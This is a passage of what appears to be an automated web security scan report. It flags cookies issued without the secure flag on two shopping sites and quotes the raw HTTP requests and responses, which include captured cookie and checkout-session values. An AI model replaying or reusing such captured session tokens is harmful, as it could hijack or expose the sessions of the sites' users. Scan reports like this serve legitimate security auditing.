Content-Length: 25431

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr">
   <head>
       <title>WideVOIP</title>
       <meta na
...[SNIP]...

7.13. https://shop.widevoip.com/modules/blockcart/blockcart-set-collapse.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://shop.widevoip.com
Path:   /modules/blockcart/blockcart-set-collapse.php

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /modules/blockcart/blockcart-set-collapse.php?ajax_blockcart_display=expand&rand=1305473193548 HTTP/1.1
Host: shop.widevoip.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
X-Requested-With: XMLHttpRequest
Referer: https://shop.widevoip.com/index.php/index.php
Cookie: 41ed22ecf5cb59c06d949492ac805a04=UKED%2FgLhlJw%3DdmQVWcNa39A%3DlenBUVuFZyk%3DRSnM4KTCFTs%3DmhLuDpazsbg%3DT6zjFnyIKgw%3D7EDKWcVgQh8%3DdYIGhRVIl18%3DVl6uLPguJfk%3DB6ZWK%2BGeBsU%3DhqnVHNXfOq0%3DxCL3WawnAVg%3DgU1t2cjcXek%3D3DVf7c5e2HA%3DhjdJFbhNQ0k%3D

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 15:26:39 GMT
Server: Apache
Set-Cookie: 41ed22ecf5cb59c06d949492ac805a04=UKED%2FgLhlJw%3DdmQVWcNa39A%3DlenBUVuFZyk%3DRSnM4KTCFTs%3DmhLuDpazsbg%3DT6zjFnyIKgw%3D7EDKWcVgQh8%3DdYIGhRVIl18%3DVl6uLPguJfk%3DB6ZWK%2BGeBsU%3DhqnVHNXfOq0%3DDNYPxktVYKQ%3D%2FyM5fQxMLgY%3D5akioyfipcA%3DDOg9mXnF7G0%3DTR8L%2FDHa3UE%3DaGT%2Bje8pLuM%3DlzyeSQtGF%2F4%3DtoENHMEg8KU%3D; expires=Sat, 04-Jun-2011 15:26:39 GMT; path=/; domain=shop.widevoip.com
Content-Length: 59
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8

expand status of the blockcart module updated in the cookie

7.14. https://www.regnow.com/checkout/cart/edit  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.regnow.com
Path:   /checkout/cart/edit

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /checkout/cart/edit HTTP/1.1
Host: www.regnow.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.regnow.com/checkout/cart/view
Cookie: uid=38WZRCH-CYS8K; visitor=1117580992; regnow_checkout_session=aa4736fe44a4f30c36a9b18ae2931c5ca2d5cff8; BIGipServerp-regnow-pod4-active=184680714.24606.0000
Content-Type: application/x-www-form-urlencoded
Content-Length: 818

currency_select=USD&set_loc